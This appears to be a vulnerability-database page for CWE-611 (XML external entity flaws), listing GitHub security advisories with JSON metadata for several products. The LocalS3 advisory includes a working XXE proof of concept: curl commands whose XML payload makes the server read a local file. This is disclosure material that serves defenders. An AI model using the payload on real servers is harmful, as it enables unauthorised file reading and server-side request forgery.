CWE-611
AllowedImproper Restriction of XML External Entity Reference
Abstraction: Base · Status: Draft
The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.
1691 vulnerabilities reference this CWE, most recent first.
GHSA-22H8-5MMQ-PGX3
Vulnerability from github – Published: 2022-05-24 16:55 – Updated: 2025-10-22 00:31Citrix StoreFront Server before 1903, 7.15 LTSR before CU4 (3.12.4000), and 7.6 LTSR before CU8 (3.0.8000) allows XXE attacks.
{
"affected": [],
"aliases": [
"CVE-2019-13608"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-08-29T19:15:00Z",
"severity": "HIGH"
},
"details": "Citrix StoreFront Server before 1903, 7.15 LTSR before CU4 (3.12.4000), and 7.6 LTSR before CU8 (3.0.8000) allows XXE attacks.",
"id": "GHSA-22h8-5mmq-pgx3",
"modified": "2025-10-22T00:31:43Z",
"published": "2022-05-24T16:55:11Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-13608"
},
{
"type": "WEB",
"url": "https://support.citrix.com/article/CTX251988"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-13608"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-22Q6-HVJ2-JGMW
Vulnerability from github – Published: 2022-05-24 16:48 – Updated: 2023-01-30 18:30IBM InfoSphere Information Server 11.3, 11.5, and 11.7 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 150905.
{
"affected": [],
"aliases": [
"CVE-2018-1845"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-06-17T15:15:00Z",
"severity": "HIGH"
},
"details": "IBM InfoSphere Information Server 11.3, 11.5, and 11.7 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 150905.",
"id": "GHSA-22q6-hvj2-jgmw",
"modified": "2023-01-30T18:30:28Z",
"published": "2022-05-24T16:48:07Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1845"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/150905"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10738917"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-22Q6-RW64-5GJJ
Vulnerability from github – Published: 2023-07-05 06:30 – Updated: 2024-04-04 05:23Zoho ManageEngine ADManager Plus before 7183 allows admin users to exploit an XXE issue to view files.
{
"affected": [],
"aliases": [
"CVE-2023-35786"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-07-05T06:15:21Z",
"severity": "MODERATE"
},
"details": "Zoho ManageEngine ADManager Plus before 7183 allows admin users to exploit an XXE issue to view files.",
"id": "GHSA-22q6-rw64-5gjj",
"modified": "2024-04-04T05:23:13Z",
"published": "2023-07-05T06:30:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35786"
},
{
"type": "WEB",
"url": "https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-35786.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-232P-99PF-H332
Vulnerability from github – Published: 2022-05-14 03:06 – Updated: 2022-05-14 03:06Umlet version < 14.3 contains a XML External Entity (XXE) vulnerability in File parsing that can result in disclosure of confidential data, denial of service, server side request forgery. This attack appear to be exploitable via Specially crafted UXF file. This vulnerability appears to have been fixed in 14.3.
{
"affected": [],
"aliases": [
"CVE-2018-1000548"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-06-26T16:29:00Z",
"severity": "HIGH"
},
"details": "Umlet version \u003c 14.3 contains a XML External Entity (XXE) vulnerability in File parsing that can result in disclosure of confidential data, denial of service, server side request forgery. This attack appear to be exploitable via Specially crafted UXF file. This vulnerability appears to have been fixed in 14.3.",
"id": "GHSA-232p-99pf-h332",
"modified": "2022-05-14T03:06:13Z",
"published": "2022-05-14T03:06:13Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000548"
},
{
"type": "WEB",
"url": "https://github.com/umlet/umlet/issues/500"
},
{
"type": "WEB",
"url": "http://0dd.zone/2018/04/23/UMLet-XXE"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-2363-CQG2-863C
Vulnerability from github – Published: 2021-07-27 19:02 – Updated: 2025-09-16 15:06An XXE issue in SAXBuilder in JDOM through 2.0.6 allows attackers to cause a denial of service via a crafted HTTP request. As a workaround, to avoid external entities being expanded, one can call builder.setExpandEntities(false) and they won't be expanded.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.jdom:jdom2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.0.6.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.jdom:jdom"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "2.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-33813"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": true,
"github_reviewed_at": "2021-07-27T19:02:41Z",
"nvd_published_at": "2021-06-16T12:15:00Z",
"severity": "HIGH"
},
"details": "An XXE issue in SAXBuilder in JDOM through 2.0.6 allows attackers to cause a denial of service via a crafted HTTP request. As a workaround, to avoid external entities being expanded, one can call `builder.setExpandEntities(false)` and they won\u0027t be expanded.",
"id": "GHSA-2363-cqg2-863c",
"modified": "2025-09-16T15:06:10Z",
"published": "2021-07-27T19:02:56Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-33813"
},
{
"type": "WEB",
"url": "https://github.com/hunterhacker/jdom/issues/189"
},
{
"type": "WEB",
"url": "https://github.com/hunterhacker/jdom/pull/188"
},
{
"type": "WEB",
"url": "https://github.com/hunterhacker/jdom/commit/dd4f3c2fc7893edd914954c73eb577f925a7d361"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EWFVYTHGILOQXUA7U3SPOERQXL7OPSZG"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AH46QHE5GIMT6BL6C3GDTOYF27JYILXM"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00012.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00026.html"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/rfb7a93e40ebeb1e0068cde0bf3834dcab46bb1ef06d6424db48ed9fd@%3Cdev.tika.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/rbc075a4ac85e7a8e47420b7383f16ffa0af3b792b8423584735f369f@%3Cissues.solr.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r9974f64723875052e02787b2a5eda689ac5247c71b827d455e5dc9a6@%3Cissues.solr.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r89b3800cfabb1e773e49425e5d4239c28a659839a2eca6af3431482e@%3Cissues.solr.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r845e987b7cd8efe610284958e997b84583f5a98d3394adc09e3482fe@%3Cissues.solr.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r6db397ae7281ead825338200d1f62d2827585a70797cc9ac0c4bd23f@%3Cissues.solr.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r5674106135bb1a6ef57483f4c63a9c44bca85d0e2a8a05895a8f1d89@%3Cissues.solr.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r21c406c7ed88fe340db7dbae75e58355159e6c324037c7d5547bf40b@%3Cissues.solr.apache.org%3E"
},
{
"type": "WEB",
"url": "https://github.com/hunterhacker/jdom/releases/tag/JDOM-2.0.6.1"
},
{
"type": "WEB",
"url": "https://github.com/hunterhacker/jdom/releases"
},
{
"type": "PACKAGE",
"url": "https://github.com/hunterhacker/jdom"
},
{
"type": "WEB",
"url": "https://alephsecurity.com/vulns/aleph-2021003"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "XML External Entity (XXE) Injection in JDOM"
}
GHSA-23CF-7M42-487J
Vulnerability from github – Published: 2022-05-24 17:37 – Updated: 2022-05-24 17:37An XXE attack can occur in Kronos WebTA 5.0.4 when SAML is used.
{
"affected": [],
"aliases": [
"CVE-2020-35604"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-12-21T19:15:00Z",
"severity": "CRITICAL"
},
"details": "An XXE attack can occur in Kronos WebTA 5.0.4 when SAML is used.",
"id": "GHSA-23cf-7m42-487j",
"modified": "2022-05-24T17:37:08Z",
"published": "2022-05-24T17:37:08Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35604"
},
{
"type": "WEB",
"url": "https://www.mindpointgroup.com/blog/webta-xxe-version-5-0-4-vulnerability"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-23F3-RJ2M-G7GQ
Vulnerability from github – Published: 2022-05-24 17:24 – Updated: 2024-04-04 02:55This vulnerability allows remote attackers to disclose sensitive information on affected installations of Veeam ONE 10.0.0.750_20200415. Authentication is not required to exploit this vulnerability. The specific flaw exists within the SSRSReport class. Due to the improper restriction of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose file contents in the context of SYSTEM. Was ZDI-CAN-10709.
{
"affected": [],
"aliases": [
"CVE-2020-15418"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-07-28T18:15:00Z",
"severity": "HIGH"
},
"details": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Veeam ONE 10.0.0.750_20200415. Authentication is not required to exploit this vulnerability. The specific flaw exists within the SSRSReport class. Due to the improper restriction of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose file contents in the context of SYSTEM. Was ZDI-CAN-10709.",
"id": "GHSA-23f3-rj2m-g7gq",
"modified": "2024-04-04T02:55:13Z",
"published": "2022-05-24T17:24:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15418"
},
{
"type": "WEB",
"url": "https://www.veeam.com/kb3221"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-20-821"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-23Q6-8QM4-482Q
Vulnerability from github – Published: 2022-05-14 03:22 – Updated: 2022-05-14 03:22Digital Guardian Management Console 7.1.2.0015 has an XXE issue.
{
"affected": [],
"aliases": [
"CVE-2018-10175"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-04-20T21:29:00Z",
"severity": "MODERATE"
},
"details": "Digital Guardian Management Console 7.1.2.0015 has an XXE issue.",
"id": "GHSA-23q6-8qm4-482q",
"modified": "2022-05-14T03:22:02Z",
"published": "2022-05-14T03:22:02Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-10175"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/147261/Digital-Guardian-Management-Console-7.1.2.0015-XXE-Injection.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-23V7-F3GM-7PMW
Vulnerability from github – Published: 2022-05-13 01:31 – Updated: 2022-05-13 01:31IBM Sterling B2B Integrator Standard Edition 5.2.0 snf 6.0.0.0 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 156239.
{
"affected": [],
"aliases": [
"CVE-2019-4043"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-04-02T14:29:00Z",
"severity": "HIGH"
},
"details": "IBM Sterling B2B Integrator Standard Edition 5.2.0 snf 6.0.0.0 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 156239.",
"id": "GHSA-23v7-f3gm-7pmw",
"modified": "2022-05-13T01:31:13Z",
"published": "2022-05-13T01:31:13Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-4043"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/156239"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10874238"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/107778"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-2466-4485-4PXJ
Vulnerability from github – Published: 2025-03-10 18:29 – Updated: 2025-03-10 18:29Description
The LocalS3 project contains an XML External Entity (XXE) Injection vulnerability in its bucket operations that process XML data. Specifically, the vulnerability exists in the bucket ACL and bucket tagging operations. The application processes XML input without properly disabling external entity resolution, allowing an attacker to read arbitrary files from the server's filesystem.
The vulnerability occurs because the XML parser used by the application processes DOCTYPE declarations and allows external entity references. When processing bucket ACL or tagging operations, the application includes the content of external entities in its response, effectively exposing sensitive files from the server.
This type of vulnerability can be exploited to read sensitive files, perform server-side request forgery (SSRF), or potentially achieve denial of service through various XXE attack vectors.
Steps to Reproduce
-
Create a test bucket using PUT request to http://[server]/[bucket-name]
curl -X PUT "http://app/xxe-test-bucket2"``` -
Send a PUT request to http://[server]/[bucket-name]?acl with the following XXE payload: ``` curl -X PUT "http://app/xxe-test-bucket2?acl" \ -H "Content-Type: application/xml" \ -d '
]> &xxe; test test test FULL_CONTROL ' ```
-
Send a GET request to
http://[server]/[bucket-name]?aclto retrieve the bucket ACLcurl "http://app/xxe-test-bucket2?acl"
After performing these steps, the content of the target file (/flag.txt in this case) will be included in the response within the ID field of the Owner element.
Mitigations
- Configure the XML parser to disable external entity resolution by setting XMLConstants.FEATURE_SECURE_PROCESSING to true
- Disable DOCTYPE declarations in the XML parser configuration
- Implement XML input validation and sanitization before processing
- Consider using JSON instead of XML for these operations if XML parsing is not strictly necessary
Impact
The vulnerability requires no authentication and can be exploited by any user who can make HTTP requests to the server. It allows reading arbitrary files from the server's filesystem, which could expose sensitive configuration files, credentials, or other confidential information. The vulnerability can also be used to perform SSRF attacks against internal systems.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "io.github.robothy:local-s3-rest"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.21"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": true,
"github_reviewed_at": "2025-03-10T18:29:05Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "## Description\n\nThe LocalS3 project contains an XML External Entity (XXE) Injection vulnerability in its bucket operations that process XML data. Specifically, the vulnerability exists in the bucket ACL and bucket tagging operations. The application processes XML input without properly disabling external entity resolution, allowing an attacker to read arbitrary files from the server\u0027s filesystem.\n\nThe vulnerability occurs because the XML parser used by the application processes DOCTYPE declarations and allows external entity references. When processing bucket ACL or tagging operations, the application includes the content of external entities in its response, effectively exposing sensitive files from the server.\n\nThis type of vulnerability can be exploited to read sensitive files, perform server-side request forgery (SSRF), or potentially achieve denial of service through various XXE attack vectors.\n\n## Steps to Reproduce\n\n1. Create a test bucket using PUT request to http://[server]/[bucket-name]\n\n ```\n curl -X PUT \"http://app/xxe-test-bucket2\"```\n ```\n\n2. Send a PUT request to http://[server]/[bucket-name]?acl with the following XXE payload:\n ```\n curl -X PUT \"http://app/xxe-test-bucket2?acl\" \\\n -H \"Content-Type: application/xml\" \\\n -d \u0027\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n \u003c!DOCTYPE AccessControlPolicy [\n \u003c!ENTITY xxe SYSTEM \"file:///etc/hostname\" \u003e\n ]\u003e\n \u003cAccessControlPolicy\u003e\n \u003cOwner\u003e\n \u003cID\u003e\u0026xxe;\u003c/ID\u003e\n \u003cDisplayName\u003etest\u003c/DisplayName\u003e\n \u003c/Owner\u003e\n \u003cAccessControlList\u003e\n \u003cGrant\u003e\n \u003cGrantee xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:type=\"CanonicalUser\"\u003e\n \u003cID\u003etest\u003c/ID\u003e\n \u003cDisplayName\u003etest\u003c/DisplayName\u003e\n \u003c/Grantee\u003e\n \u003cPermission\u003eFULL_CONTROL\u003c/Permission\u003e\n \u003c/Grant\u003e\n \u003c/AccessControlList\u003e\n \u003c/AccessControlPolicy\u003e\u0027\n ```\n\n3. Send a GET request to `http://[server]/[bucket-name]?acl` to retrieve the bucket ACL\n\n ```\n curl \"http://app/xxe-test-bucket2?acl\"\n ```\n\nAfter performing these steps, the content of the target file (/flag.txt in this case) will be included in the response within the ID field of the Owner element.\n\n## Mitigations\n\n- Configure the XML parser to disable external entity resolution by setting XMLConstants.FEATURE_SECURE_PROCESSING to true\n- Disable DOCTYPE declarations in the XML parser configuration\n- Implement XML input validation and sanitization before processing\n- Consider using JSON instead of XML for these operations if XML parsing is not strictly necessary\n\n## Impact\n\nThe vulnerability requires no authentication and can be exploited by any user who can make HTTP requests to the server. It allows reading arbitrary files from the server\u0027s filesystem, which could expose sensitive configuration files, credentials, or other confidential information. The vulnerability can also be used to perform SSRF attacks against internal systems.",
"id": "GHSA-2466-4485-4pxj",
"modified": "2025-03-10T18:29:05Z",
"published": "2025-03-10T18:29:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Robothy/local-s3/security/advisories/GHSA-2466-4485-4pxj"
},
{
"type": "WEB",
"url": "https://github.com/Robothy/local-s3/commit/d6ed756ceb30c1eb9d4263321ac683d734f8836f"
},
{
"type": "PACKAGE",
"url": "https://github.com/Robothy/local-s3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "LocalS3 Project Bucket Operations Vulnerable to XML External Entity (XXE) Injection"
}
Mitigation
Many XML parsers and validators can be configured to disable external entity expansion.
CAPEC-221: Data Serialization External Entities Blowup
This attack takes advantage of the entity replacement property of certain data serialization languages (e.g., XML, YAML, etc.) where the value of the replacement is a URI. A well-crafted file could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.